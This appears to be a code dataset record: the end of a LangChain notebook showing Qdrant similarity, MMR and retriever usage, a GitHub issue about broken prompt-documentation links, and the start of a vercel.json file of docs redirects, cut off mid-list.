"```python\n",
"from qdrant_client.http import models as rest\n",
"\n",
"query = \"What did the president say about Ketanji Brown Jackson\"\n",
"found_docs = qdrant.similarity_search_with_score(query, filter=rest.Filter(...))\n",
"```"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "c58c30bf",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:39:53.032744Z",
"start_time": "2023-04-04T10:39:53.028673Z"
}
},
"source": [
"## Maximum marginal relevance search (MMR)\n",
"\n",
"If you'd like to look up for some similar documents, but you'd also like to receive diverse results, MMR is method you should consider. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents."
]
},
{
"cell_type": "code",
"execution_count": 13,
"id": "76810fb6",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:26.010947Z",
"start_time": "2023-04-04T10:51:25.647687Z"
}
},
"outputs": [],
"source": [
"query = \"What did the president say about Ketanji Brown Jackson\"\n",
"found_docs = qdrant.max_marginal_relevance_search(query, k=2, fetch_k=10)"
]
},
{
"cell_type": "code",
"execution_count": 14,
"id": "80c6db11",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:26.016979Z",
"start_time": "2023-04-04T10:51:26.013329Z"
}
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"1. Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \n",
"\n",
"Tonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n",
"\n",
"One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n",
"\n",
"And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence. \n",
"\n",
"2. We can\u2019t change how divided we\u2019ve been. But we can change how we move forward\u2014on COVID-19 and other issues we must face together. \n",
"\n",
"I recently visited the New York City Police Department days after the funerals of Officer Wilbert Mora and his partner, Officer Jason Rivera. \n",
"\n",
"They were responding to a 9-1-1 call when a man shot and killed them with a stolen gun. \n",
"\n",
"Officer Mora was 27 years old. \n",
"\n",
"Officer Rivera was 22. \n",
"\n",
"Both Dominican Americans who\u2019d grown up on the same streets they later chose to patrol as police officers. \n",
"\n",
"I spoke with their families and told them that we are forever in debt for their sacrifice, and we will carry on their mission to restore the trust and safety every community deserves. \n",
"\n",
"I\u2019ve worked on these issues a long time. \n",
"\n",
"I know what works: Investing in crime preventionand community police officers who\u2019ll walk the beat, who\u2019ll know the neighborhood, and who can restore trust and safety. \n",
"\n"
]
}
],
"source": [
"for i, doc in enumerate(found_docs):\n",
" print(f\"{i + 1}.\", doc.page_content, \"\\n\")"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "691a82d6",
"metadata": {},
"source": [
"## Qdrant as a Retriever\n",
"\n",
"Qdrant, as all the other vector stores, is a LangChain Retriever, by using cosine similarity. "
]
},
{
"cell_type": "code",
"execution_count": 15,
"id": "9427195f",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:26.031451Z",
"start_time": "2023-04-04T10:51:26.018763Z"
}
},
"outputs": [
{
"data": {
"text/plain": [
"VectorStoreRetriever(vectorstore=<langchain.vectorstores.qdrant.Qdrant object at 0x7fc4e5720a00>, search_type='similarity', search_kwargs={})"
]
},
"execution_count": 15,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"retriever = qdrant.as_retriever()\n",
"retriever"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "0c851b4f",
"metadata": {},
"source": [
"It might be also specified to use MMR as a search strategy, instead of similarity."
]
},
{
"cell_type": "code",
"execution_count": 16,
"id": "64348f1b",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:26.043909Z",
"start_time": "2023-04-04T10:51:26.034284Z"
}
},
"outputs": [
{
"data": {
"text/plain": [
"VectorStoreRetriever(vectorstore=<langchain.vectorstores.qdrant.Qdrant object at 0x7fc4e5720a00>, search_type='mmr', search_kwargs={})"
]
},
"execution_count": 16,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"retriever = qdrant.as_retriever(search_type=\"mmr\")\n",
"retriever"
]
},
{
"cell_type": "code",
"execution_count": 17,
"id": "f3c70c31",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:26.495652Z",
"start_time": "2023-04-04T10:51:26.046407Z"
}
},
"outputs": [
{
"data": {
"text/plain": [
"Document(page_content='Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \\n\\nTonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \\n\\nOne of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \\n\\nAnd I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence.', metadata={'source': '../../../state_of_the_union.txt'})"
]
},
"execution_count": 17,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"query = \"What did the president say about Ketanji Brown Jackson\"\n",
"retriever.get_relevant_documents(query)[0]"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "0358ecde",
"metadata": {},
"source": [
"## Customizing Qdrant\n",
"\n",
"There are some options to use an existing Qdrant collection within your Langchain application. In such cases you may need to define how to map Qdrant point into the Langchain `Document`.\n",
"\n",
"### Named vectors\n",
"\n",
"Qdrant supports [multiple vectors per point](https://qdrant.tech/documentation/concepts/collections/#collection-with-multiple-vectors) by named vectors. Langchain requires just a single embedding per document and, by default, uses a single vector. However, if you work with a collection created externally or want to have the named vector used, you can configure it by providing its name.\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"outputs": [],
"source": [
"Qdrant.from_documents(\n",
" docs,\n",
" embeddings,\n",
" location=\":memory:\",\n",
" collection_name=\"my_documents_2\",\n",
" vector_name=\"custom_vector\",\n",
")"
],
"metadata": {
"collapsed": false
},
"id": "1f11adf8"
},
{
"cell_type": "markdown",
"source": [
"As a Langchain user, you won't see any difference whether you use named vectors or not. Qdrant integration will handle the conversion under the hood."
],
"metadata": {
"collapsed": false
},
"id": "b34f5230"
},
{
"cell_type": "markdown",
"source": [
"### Metadata\n",
"\n",
"Qdrant stores your vector embeddings along with the optional JSON-like payload. Payloads are optional, but since LangChain assumes the embeddings are generated from the documents, we keep the context data, so you can extract the original texts as well.\n",
"\n",
"By default, your document is going to be stored in the following payload structure:\n",
"\n",
"```json\n",
"{\n",
" \"page_content\": \"Lorem ipsum dolor sit amet\",\n",
" \"metadata\": {\n",
" \"foo\": \"bar\"\n",
" }\n",
"}\n",
"```\n",
"\n",
"You can, however, decide to use different keys for the page content and metadata. That's useful if you already have a collection that you'd like to reuse."
],
"metadata": {
"collapsed": false
},
"id": "b2350093"
},
{
"cell_type": "code",
"execution_count": 19,
"id": "e4d6baf9",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T11:08:31.739141Z",
"start_time": "2023-04-04T11:08:30.229748Z"
}
},
"outputs": [
{
"data": {
"text/plain": [
"<langchain.vectorstores.qdrant.Qdrant at 0x7fc4e2baa230>"
]
},
"execution_count": 19,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"Qdrant.from_documents(\n",
" docs,\n",
" embeddings,\n",
" location=\":memory:\",\n",
" collection_name=\"my_documents_2\",\n",
" content_payload_key=\"my_page_content_key\",\n",
" metadata_payload_key=\"my_meta\",\n",
")"
]
},
{
"cell_type": "code",
"execution_count": null,
"id": "2300e785",
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3 (ipykernel)",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.11.3"
}
},
"nbformat": 4,
"nbformat_minor": 5
} |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,477 | DOC: Broken Links in Prompts Sub Categories Pages | ### Issue with current documentation:
The INFO: Python Guide links in both https://docs.langchain.com/docs/components/prompts/prompt-template and https://docs.langchain.com/docs/components/prompts/example-selectors are both broken (similar to #8105)
### Idea or request for content:
The pages have simply been moved from https://python.langchain.com/docs/modules/prompts/ to https://python.langchain.com/docs/modules/model_io/prompts/, so setting up corresponding redirects should fix it
I can open up a PR with the corresponding redirects myself | https://github.com/langchain-ai/langchain/issues/8477 | https://github.com/langchain-ai/langchain/pull/8478 | 08f5e6b8012f5eda2609103f33676199a3781a15 | 04ebdbe98f99624aa2adc42c9f622a9668967878 | "2023-07-30T04:41:57Z" | python | "2023-07-31T02:38:52Z" | docs/docs_skeleton/vercel.json | {
"redirects": [
{
"source": "/en/latest/additional_resources/youtube.html",
"destination": "/docs/additional_resources/youtube"
},
{
"source": "/en/latest/integrations/agent_with_wandb_tracing.html",
"destination": "/docs/integrations/providers/agent_with_wandb_tracing"
},
{
"source": "/docs/integrations/agent_with_wandb_tracing",
"destination": "/docs/integrations/providers/agent_with_wandb_tracing"
},
{
"source": "/en/latest/integrations/ai21.html",
"destination": "/docs/integrations/providers/ai21"
},
{
"source": "/docs/integrations/ai21",
"destination": "/docs/integrations/providers/ai21"
},
{
"source": "/en/latest/integrations/aim_tracking.html",
"destination": "/docs/integrations/providers/aim_tracking"
},
{
"source": "/docs/integrations/aim_tracking",
"destination": "/docs/integrations/providers/aim_tracking"
},
{
"source": "/en/latest/integrations/airbyte.html",
"destination": "/docs/integrations/providers/airbyte"
},
{
"source": "/docs/integrations/airbyte",
"destination": "/docs/integrations/providers/airbyte"
},
{
"source": "/en/latest/integrations/aleph_alpha.html",
"destination": "/docs/integrations/providers/aleph_alpha"
},
{
"source": "/docs/integrations/aleph_alpha",
"destination": "/docs/integrations/providers/aleph_alpha"
},
{
"source": "/en/latest/integrations/analyticdb.html",
"destination": "/docs/integrations/providers/analyticdb"
},
{
"source": "/docs/integrations/analyticdb",
"destination": "/docs/integrations/providers/analyticdb"
},
{
"source": "/en/latest/integrations/annoy.html",
"destination": "/docs/integrations/providers/annoy"
},
{
"source": "/docs/integrations/annoy",
"destination": "/docs/integrations/providers/annoy"
},
{
"source": "/en/latest/integrations/anyscale.html",
"destination": "/docs/integrations/providers/anyscale"
},
{
"source": "/docs/integrations/anyscale",
"destination": "/docs/integrations/providers/anyscale"
},
{
"source": "/en/latest/integrations/apify.html",
"destination": "/docs/integrations/providers/apify"
},
{
"source": "/docs/integrations/apify",
"destination": "/docs/integrations/providers/apify"
},
{
"source": "/en/latest/integrations/argilla.html",
"destination": "/docs/integrations/providers/argilla"
},
{
"source": "/docs/integrations/argilla",
"destination": "/docs/integrations/providers/argilla"
},
{
"source": "/en/latest/integrations/arxiv.html",
"destination": "/docs/integrations/providers/arxiv"
},
{
"source": "/docs/integrations/arxiv",
"destination": "/docs/integrations/providers/arxiv"
},
{
"source": "/en/latest/integrations/atlas.html",
"destination": "/docs/integrations/providers/atlas"
},
{
"source": "/docs/integrations/atlas",
"destination": "/docs/integrations/providers/atlas"
},
{
"source": "/en/latest/integrations/awadb.html",
"destination": "/docs/integrations/providers/awadb"
},
{
"source": "/docs/integrations/awadb",
"destination": "/docs/integrations/providers/awadb"
},
{
"source": "/en/latest/integrations/aws_s3.html",
"destination": "/docs/integrations/providers/aws_s3"
},
{
"source": "/docs/integrations/aws_s3",
"destination": "/docs/integrations/providers/aws_s3"
},
{
"source": "/en/latest/integrations/azlyrics.html",
"destination": "/docs/integrations/providers/azlyrics"
},
{
"source": "/docs/integrations/azlyrics",
"destination": "/docs/integrations/providers/azlyrics"
},
{
"source": "/en/latest/integrations/azure_blob_storage.html",
"destination": "/docs/integrations/providers/azure_blob_storage"
},
{
"source": "/docs/integrations/azure_blob_storage",
"destination": "/docs/integrations/providers/azure_blob_storage"
},
{
"source": "/en/latest/integrations/azure_cognitive_search_.html",
"destination": "/docs/integrations/providers/azure_cognitive_search_"
},
{
"source": "/docs/integrations/azure_cognitive_search_",
"destination": "/docs/integrations/providers/azure_cognitive_search_"
},
{
"source": "/en/latest/integrations/azure_openai.html",
"destination": "/docs/integrations/providers/azure_openai"
},
{
"source": "/docs/integrations/azure_openai",
"destination": "/docs/integrations/providers/azure_openai"
},
{
"source": "/en/latest/integrations/bananadev.html",
"destination": "/docs/integrations/providers/bananadev"
},
{
"source": "/docs/integrations/bananadev",
"destination": "/docs/integrations/providers/bananadev"
},
{
"source": "/en/latest/ecosystem/baseten.html",
"destination": "/docs/integrations/providers/baseten"
},
{
"source": "/docs/integrations/baseten",
"destination": "/docs/integrations/providers/baseten"
},
{
"source": "/en/latest/integrations/beam.html",
"destination": "/docs/integrations/providers/beam"
},
{
"source": "/docs/integrations/beam",
"destination": "/docs/integrations/providers/beam"
},
{
"source": "/en/latest/integrations/amazon_bedrock.html",
"destination": "/docs/integrations/providers/bedrock"
},
{
"source": "/docs/integrations/bedrock",
"destination": "/docs/integrations/providers/bedrock"
},
{
"source": "/en/latest/integrations/bilibili.html",
"destination": "/docs/integrations/providers/bilibili"
},
{
"source": "/docs/integrations/bilibili",
"destination": "/docs/integrations/providers/bilibili"
},
{
"source": "/en/latest/integrations/blackboard.html",
"destination": "/docs/integrations/providers/blackboard"
},
{
"source": "/docs/integrations/blackboard",
"destination": "/docs/integrations/providers/blackboard"
},
{
"source": "/en/latest/integrations/cassandra.html",
"destination": "/docs/integrations/providers/cassandra"
},
{
"source": "/docs/integrations/cassandra",
"destination": "/docs/integrations/providers/cassandra"
},
{
"source": "/en/latest/integrations/cerebriumai.html",
"destination": "/docs/integrations/providers/cerebriumai"
},
{
"source": "/docs/integrations/cerebriumai",
"destination": "/docs/integrations/providers/cerebriumai"
},
{
"source": "/en/latest/integrations/chroma.html",
"destination": "/docs/integrations/providers/chroma"
},
{
"source": "/docs/integrations/chroma",
"destination": "/docs/integrations/providers/chroma"
},
{
"source": "/en/latest/integrations/clearml_tracking.html",
"destination": "/docs/integrations/providers/clearml_tracking"
},
{
"source": "/docs/integrations/clearml_tracking",
"destination": "/docs/integrations/providers/clearml_tracking"
},
{
"source": "/en/latest/integrations/cohere.html",
"destination": "/docs/integrations/providers/cohere"
},
{
"source": "/docs/integrations/cohere",
"destination": "/docs/integrations/providers/cohere"
},
{
"source": "/en/latest/integrations/college_confidential.html",
"destination": "/docs/integrations/providers/college_confidential"
},
{
"source": "/docs/integrations/college_confidential",
"destination": "/docs/integrations/providers/college_confidential"
},
{
"source": "/en/latest/integrations/comet_tracking.html",
"destination": "/docs/integrations/providers/comet_tracking"
},
{
"source": "/docs/integrations/comet_tracking",
"destination": "/docs/integrations/providers/comet_tracking"
},
{
"source": "/en/latest/integrations/confluence.html",
"destination": "/docs/integrations/providers/confluence"
},
{
"source": "/docs/integrations/confluence",
"destination": "/docs/integrations/providers/confluence"
},
{
"source": "/en/latest/integrations/ctransformers.html",
"destination": "/docs/integrations/providers/ctransformers"
},
{
"source": "/docs/integrations/ctransformers",
"destination": "/docs/integrations/providers/ctransformers"
},
{
"source": "/en/latest/integrations/databerry.html",
"destination": "/docs/integrations/providers/chaindesk"
},
{
"source": "/docs/integrations/chaindesk",
"destination": "/docs/integrations/providers/chaindesk"
},
{
"source": "/docs/integrations/databerry",
"destination": "/docs/integrations/providers/chaindesk"
},
{
"source": "/docs/integrations/chaindesk",
"destination": "/docs/integrations/providers/chaindesk"
},
{
"source": "/en/latest/integrations/databricks/databricks.html",
"destination": "/docs/integrations/providers/databricks"
},
{
"source": "/docs/integrations/databricks",
"destination": "/docs/integrations/providers/databricks"
},
{
"source": "/en/latest/integrations/databricks.html",
"destination": "/docs/integrations/providers/databricks"
},
{
"source": "/docs/integrations/databricks",
"destination": "/docs/integrations/providers/databricks"
},
{
"source": "/en/latest/integrations/deepinfra.html",
"destination": "/docs/integrations/providers/deepinfra"
},
{
"source": "/docs/integrations/deepinfra",
"destination": "/docs/integrations/providers/deepinfra"
},
{
"source": "/en/latest/integrations/deeplake.html",
"destination": "/docs/integrations/providers/deeplake"
},
{
"source": "/docs/integrations/deeplake",
"destination": "/docs/integrations/providers/deeplake"
},
{
"source": "/en/latest/integrations/diffbot.html",
"destination": "/docs/integrations/providers/diffbot"
},
{
"source": "/docs/integrations/diffbot",
"destination": "/docs/integrations/providers/diffbot"
},
{
"source": "/en/latest/integrations/discord.html",
"destination": "/docs/integrations/providers/discord"
},
{
"source": "/docs/integrations/discord",
"destination": "/docs/integrations/providers/discord"
},
{
"source": "/en/latest/integrations/docugami.html",
"destination": "/docs/integrations/providers/docugami"
},
{
"source": "/docs/integrations/docugami",
"destination": "/docs/integrations/providers/docugami"
},
{
"source": "/en/latest/integrations/duckdb.html",
"destination": "/docs/integrations/providers/duckdb"
},
{
"source": "/docs/integrations/duckdb",
"destination": "/docs/integrations/providers/duckdb"
},
{
"source": "/en/latest/integrations/elasticsearch.html",
"destination": "/docs/integrations/providers/elasticsearch"
},
{
"source": "/docs/integrations/elasticsearch",
"destination": "/docs/integrations/providers/elasticsearch"
},
{
"source": "/en/latest/integrations/evernote.html",
"destination": "/docs/integrations/providers/evernote"
},
{
"source": "/docs/integrations/evernote",
"destination": "/docs/integrations/providers/evernote"
},
{
"source": "/en/latest/integrations/facebook_chat.html",
"destination": "/docs/integrations/providers/facebook_chat"
},
{
"source": "/docs/integrations/facebook_chat",
"destination": "/docs/integrations/providers/facebook_chat"
},
{
"source": "/en/latest/integrations/figma.html",
"destination": "/docs/integrations/providers/figma"
},
{
"source": "/docs/integrations/figma",
"destination": "/docs/integrations/providers/figma"
},
{
"source": "/en/latest/integrations/forefrontai.html",
"destination": "/docs/integrations/providers/forefrontai"
},
{
"source": "/docs/integrations/forefrontai",
"destination": "/docs/integrations/providers/forefrontai"
},
{
"source": "/en/latest/integrations/git.html",
"destination": "/docs/integrations/providers/git"
},
{
"source": "/docs/integrations/git",
"destination": "/docs/integrations/providers/git"
},
{
"source": "/en/latest/integrations/gitbook.html",
"destination": "/docs/integrations/providers/gitbook"
},
{
"source": "/docs/integrations/gitbook",
"destination": "/docs/integrations/providers/gitbook"
},
{
"source": "/en/latest/integrations/google_bigquery.html",
"destination": "/docs/integrations/providers/google_bigquery"
},
{
"source": "/docs/integrations/google_bigquery",
"destination": "/docs/integrations/providers/google_bigquery"
},
{
"source": "/en/latest/integrations/google_cloud_storage.html",
"destination": "/docs/integrations/providers/google_cloud_storage"
},
{
"source": "/docs/integrations/google_cloud_storage",
"destination": "/docs/integrations/providers/google_cloud_storage"
},
{
"source": "/en/latest/integrations/google_drive.html",
"destination": "/docs/integrations/providers/google_drive"
},
{
"source": "/docs/integrations/google_drive",
"destination": "/docs/integrations/providers/google_drive"
},
{
"source": "/en/latest/integrations/google_search.html",
"destination": "/docs/integrations/providers/google_search"
},
{
"source": "/docs/integrations/google_search",
"destination": "/docs/integrations/providers/google_search"
},
{
"source": "/en/latest/integrations/google_serper.html",
"destination": "/docs/integrations/providers/google_serper"
},
{
"source": "/docs/integrations/google_serper",
"destination": "/docs/integrations/providers/google_serper"
},
{
"source": "/en/latest/integrations/gooseai.html",
"destination": "/docs/integrations/providers/gooseai"
},
{
"source": "/docs/integrations/gooseai",
"destination": "/docs/integrations/providers/gooseai"
},
{
"source": "/en/latest/integrations/gpt4all.html",
"destination": "/docs/integrations/providers/gpt4all"
},
{
"source": "/docs/integrations/gpt4all",
"destination": "/docs/integrations/providers/gpt4all"
},
{
"source": "/en/latest/integrations/graphsignal.html",
"destination": "/docs/integrations/providers/graphsignal"
},
{
"source": "/docs/integrations/graphsignal",
"destination": "/docs/integrations/providers/graphsignal"
},
{
"source": "/en/latest/integrations/gutenberg.html",
"destination": "/docs/integrations/providers/gutenberg"
},
{
"source": "/docs/integrations/gutenberg",
"destination": "/docs/integrations/providers/gutenberg"
},
{
"source": "/en/latest/integrations/hacker_news.html",
"destination": "/docs/integrations/providers/hacker_news"
},
{
"source": "/docs/integrations/hacker_news",
"destination": "/docs/integrations/providers/hacker_news"
},
{
"source": "/en/latest/integrations/hazy_research.html",
"destination": "/docs/integrations/providers/hazy_research"
},
{
"source": "/docs/integrations/hazy_research",
"destination": "/docs/integrations/providers/hazy_research"
},
{
"source": "/en/latest/integrations/helicone.html",
"destination": "/docs/integrations/providers/helicone"
},
{
"source": "/docs/integrations/helicone",
"destination": "/docs/integrations/providers/helicone"
},
{
"source": "/en/latest/integrations/huggingface.html",
"destination": "/docs/integrations/providers/huggingface"
},
{
"source": "/docs/integrations/huggingface",
"destination": "/docs/integrations/providers/huggingface"
},
{
"source": "/en/latest/integrations/ifixit.html",
"destination": "/docs/integrations/providers/ifixit"
},
{
"source": "/docs/integrations/ifixit",
"destination": "/docs/integrations/providers/ifixit"
},
{
"source": "/en/latest/integrations/imsdb.html",
"destination": "/docs/integrations/providers/imsdb"
},
{
"source": "/docs/integrations/imsdb",
"destination": "/docs/integrations/providers/imsdb"
},
{
"source": "/en/latest/integrations/jina.html",
"destination": "/docs/integrations/providers/jina"
},
{
"source": "/docs/integrations/jina",
"destination": "/docs/integrations/providers/jina"
},
{
"source": "/en/latest/integrations/lancedb.html",
"destination": "/docs/integrations/providers/lancedb"
},
{
"source": "/docs/integrations/lancedb",
"destination": "/docs/integrations/providers/lancedb"
},
{
"source": "/en/latest/integrations/langchain_decorators.html",
"destination": "/docs/integrations/providers/langchain_decorators"
},
{
"source": "/docs/integrations/langchain_decorators",
"destination": "/docs/integrations/providers/langchain_decorators"
},
{
"source": "/en/latest/integrations/llamacpp.html",
"destination": "/docs/integrations/providers/llamacpp"
},
{
"source": "/docs/integrations/llamacpp",
"destination": "/docs/integrations/providers/llamacpp"
},
{
"source": "/en/latest/integrations/mediawikidump.html",
"destination": "/docs/integrations/providers/mediawikidump"
},
{
"source": "/docs/integrations/mediawikidump",
"destination": "/docs/integrations/providers/mediawikidump"
},
{
"source": "/en/latest/integrations/metal.html",
"destination": "/docs/integrations/providers/metal"
},
{
"source": "/docs/integrations/metal",
"destination": "/docs/integrations/providers/metal"
},
{
"source": "/en/latest/integrations/microsoft_onedrive.html",
"destination": "/docs/integrations/providers/microsoft_onedrive"
},
{
"source": "/docs/integrations/microsoft_onedrive",
"destination": "/docs/integrations/providers/microsoft_onedrive"
},
{
"source": "/en/latest/integrations/microsoft_powerpoint.html",
"destination": "/docs/integrations/providers/microsoft_powerpoint"
},
{
"source": "/docs/integrations/microsoft_powerpoint",
"destination": "/docs/integrations/providers/microsoft_powerpoint"
},
{
"source": "/en/latest/integrations/microsoft_word.html",
"destination": "/docs/integrations/providers/microsoft_word"
},
{
"source": "/docs/integrations/microsoft_word",
"destination": "/docs/integrations/providers/microsoft_word"
},
{
"source": "/en/latest/integrations/milvus.html",
"destination": "/docs/integrations/providers/milvus"
},
{
"source": "/docs/integrations/milvus",
"destination": "/docs/integrations/providers/milvus"
},
{
"source": "/en/latest/integrations/mlflow_tracking.html",
"destination": "/docs/integrations/providers/mlflow_tracking"
},
{
"source": "/docs/integrations/mlflow_tracking",
"destination": "/docs/integrations/providers/mlflow_tracking"
},
{
"source": "/en/latest/integrations/modal.html",
"destination": "/docs/integrations/providers/modal"
},
{
"source": "/docs/integrations/modal",
"destination": "/docs/integrations/providers/modal"
},
{
"source": "/en/latest/ecosystem/modelscope.html",
"destination": "/docs/integrations/providers/modelscope"
},
{
"source": "/docs/integrations/modelscope",
"destination": "/docs/integrations/providers/modelscope"
},
{
"source": "/en/latest/integrations/modern_treasury.html",
"destination": "/docs/integrations/providers/modern_treasury"
},
{
"source": "/docs/integrations/modern_treasury",
"destination": "/docs/integrations/providers/modern_treasury"
},
{
"source": "/en/latest/integrations/momento.html",
"destination": "/docs/integrations/providers/momento"
},
{
"source": "/docs/integrations/momento",
"destination": "/docs/integrations/providers/momento"
},
{
"source": "/en/latest/integrations/myscale.html",
"destination": "/docs/integrations/providers/myscale"
},
{
"source": "/docs/integrations/myscale",
"destination": "/docs/integrations/providers/myscale"
},
{
"source": "/en/latest/integrations/nlpcloud.html",
"destination": "/docs/integrations/providers/nlpcloud"
},
{
"source": "/docs/integrations/nlpcloud",
"destination": "/docs/integrations/providers/nlpcloud"
},
{
"source": "/en/latest/integrations/notion.html",
"destination": "/docs/integrations/providers/notion"
},
{
"source": "/docs/integrations/notion",
"destination": "/docs/integrations/providers/notion"
},
{
"source": "/en/latest/integrations/obsidian.html",
"destination": "/docs/integrations/providers/obsidian"
},
{
"source": "/docs/integrations/obsidian",
"destination": "/docs/integrations/providers/obsidian"
},
{
"source": "/en/latest/integrations/openai.html",
"destination": "/docs/integrations/providers/openai"
},
{
"source": "/docs/integrations/openai",
"destination": "/docs/integrations/providers/openai"
},
{
"source": "/en/latest/integrations/opensearch.html",
"destination": "/docs/integrations/providers/opensearch"
},
{
"source": "/docs/integrations/opensearch",
"destination": "/docs/integrations/providers/opensearch"
},
{
"source": "/en/latest/integrations/openweathermap.html",
"destination": "/docs/integrations/providers/openweathermap"
},
{
"source": "/docs/integrations/openweathermap",
"destination": "/docs/integrations/providers/openweathermap"
},
{
"source": "/en/latest/integrations/petals.html",
"destination": "/docs/integrations/providers/petals"
},
{
"source": "/docs/integrations/petals",
"destination": "/docs/integrations/providers/petals"
},
{
"source": "/en/latest/integrations/pgvector.html",
"destination": "/docs/integrations/providers/pgvector"
},
{
"source": "/docs/integrations/pgvector",
"destination": "/docs/integrations/providers/pgvector"
},
{
"source": "/en/latest/integrations/pinecone.html",
"destination": "/docs/integrations/providers/pinecone"
},
{
"source": "/docs/integrations/pinecone",
"destination": "/docs/integrations/providers/pinecone"
},
{
"source": "/en/latest/integrations/pipelineai.html",
"destination": "/docs/integrations/providers/pipelineai"
},
{
"source": "/docs/integrations/pipelineai",
"destination": "/docs/integrations/providers/pipelineai"
},
{
"source": "/en/latest/integrations/predictionguard.html",
"destination": "/docs/integrations/providers/predictionguard"
},
{
"source": "/docs/integrations/predictionguard",
"destination": "/docs/integrations/providers/predictionguard"
},
{
"source": "/en/latest/integrations/promptlayer.html",
"destination": "/docs/integrations/providers/promptlayer"
},
{
"source": "/docs/integrations/promptlayer",
"destination": "/docs/integrations/providers/promptlayer"
},
{
"source": "/en/latest/integrations/psychic.html",
"destination": "/docs/integrations/providers/psychic"
},
{
"source": "/docs/integrations/psychic",
"destination": "/docs/integrations/providers/psychic"
},
{
"source": "/en/latest/integrations/qdrant.html",
"destination": "/docs/integrations/providers/qdrant"
},
{
"source": "/docs/integrations/qdrant",
"destination": "/docs/integrations/providers/qdrant"
},
{
"source": "/en/latest/integrations/ray_serve.html",
"destination": "/docs/integrations/providers/ray_serve"
},
{
"source": "/docs/integrations/ray_serve",
"destination": "/docs/integrations/providers/ray_serve"
},
{
"source": "/en/latest/integrations/rebuff.html",
"destination": "/docs/integrations/providers/rebuff"
},
{
"source": "/docs/integrations/rebuff",
"destination": "/docs/integrations/providers/rebuff"
},
{
"source": "/en/latest/integrations/reddit.html",
"destination": "/docs/integrations/providers/reddit"
},
{
"source": "/docs/integrations/reddit",
"destination": "/docs/integrations/providers/reddit"
},
{
"source": "/en/latest/integrations/redis.html",
"destination": "/docs/integrations/providers/redis"
},
{
"source": "/docs/integrations/redis",
"destination": "/docs/integrations/providers/redis"
},
{
"source": "/en/latest/integrations/replicate.html",
"destination": "/docs/integrations/providers/replicate"
},
{
"source": "/docs/integrations/replicate",
"destination": "/docs/integrations/providers/replicate"
},
{
"source": "/en/latest/integrations/roam.html",
"destination": "/docs/integrations/providers/roam"
},
{
"source": "/docs/integrations/roam",
"destination": "/docs/integrations/providers/roam"
},
{
"source": "/en/latest/integrations/runhouse.html",
"destination": "/docs/integrations/providers/runhouse"
},
{
"source": "/docs/integrations/runhouse",
"destination": "/docs/integrations/providers/runhouse"
},
{
"source": "/en/latest/integrations/rwkv.html",
"destination": "/docs/integrations/providers/rwkv"
},
{
"source": "/docs/integrations/rwkv",
"destination": "/docs/integrations/providers/rwkv"
},
{
"source": "/en/latest/integrations/sagemaker_endpoint.html",
"destination": "/docs/integrations/providers/sagemaker_endpoint"
},
{
"source": "/docs/integrations/sagemaker_endpoint",
"destination": "/docs/integrations/providers/sagemaker_endpoint"
},
{
"source": "/en/latest/integrations/searx.html",
"destination": "/docs/integrations/providers/searx"
},
{
"source": "/docs/integrations/searx",
"destination": "/docs/integrations/providers/searx"
},
{
"source": "/en/latest/integrations/serpapi.html",
"destination": "/docs/integrations/providers/serpapi"
},
{
"source": "/docs/integrations/serpapi",
"destination": "/docs/integrations/providers/serpapi"
},
{
"source": "/en/latest/integrations/shaleprotocol.html",
"destination": "/docs/integrations/providers/shaleprotocol"
},
{
"source": "/docs/integrations/shaleprotocol",
"destination": "/docs/integrations/providers/shaleprotocol"
},
{
"source": "/en/latest/integrations/sklearn.html",
"destination": "/docs/integrations/providers/sklearn"
},
{
"source": "/docs/integrations/sklearn",
"destination": "/docs/integrations/providers/sklearn"
},
{
"source": "/en/latest/integrations/slack.html",
"destination": "/docs/integrations/providers/slack"
},
{
"source": "/docs/integrations/slack",
"destination": "/docs/integrations/providers/slack"
},
{
"source": "/en/latest/integrations/spacy.html",
"destination": "/docs/integrations/providers/spacy"
},
{
"source": "/docs/integrations/spacy",
"destination": "/docs/integrations/providers/spacy"
},
{
"source": "/en/latest/integrations/spreedly.html",
